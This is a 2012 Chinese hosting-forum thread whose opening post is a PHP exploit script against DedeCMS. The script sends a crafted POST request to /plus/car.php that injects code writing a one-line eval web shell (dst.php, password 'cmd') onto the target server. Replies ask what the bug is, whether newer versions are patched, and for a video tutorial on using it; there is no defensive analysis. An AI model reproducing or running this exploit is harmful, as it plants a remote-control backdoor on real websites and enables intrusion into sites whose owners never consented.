全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2909|回复: 10
打印 上一主题 下一主题

dede那个漏洞的exp

[复制链接]
跳转到指定楼层
1#
发表于 2012-3-24 16:17:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<?php//author:舞林//date  : 2012-03-21 00:31:05//shell一句话地址,/plus/dst.php 密码cmd//www.t.com/dede/plus/car.phperror_reporting(E_ERROR);set_time_limit(0);$url ='www.t.com';//目标站url$dir ='/dede';//dedecms安装目录//$content = '$a=${@phpinfo()};';$content ='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$data .= "Content-Length:        ".strlen($content)."\r\n\r\n";$data .= $content."\r\n";$socket=fsockopen($url,'80');if ($socket) {        fwrite($socket,$data);        while (!feof($socket)) {                $exp.=fgets($socket, 1024);        }        echo $exp;}else{        echo 'socket err';}?>
2#
发表于 2012-3-24 16:20:04 来自手机 | 只看该作者
这是啥漏洞?
3#
发表于 2012-3-24 16:23:20 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
4#
发表于 2012-3-24 16:23:47 | 只看该作者
新版不知道修复没有呢
5#
发表于 2012-3-24 16:32:09 | 只看该作者
看起来很高级的样子
6#
发表于 2012-3-24 16:35:53 | 只看该作者
MJJ
7#
发表于 2012-3-24 16:39:37 | 只看该作者
这个如何利用,弄个视频教程啊!
8#
发表于 2012-3-24 16:59:16 | 只看该作者
可以排版一下吗..
9#
发表于 2012-3-24 17:24:30 | 只看该作者
好像无效了
10#
发表于 2012-3-24 17:33:49 | 只看该作者
准备抓捕
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-7 11:52 , Processed in 0.102405 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表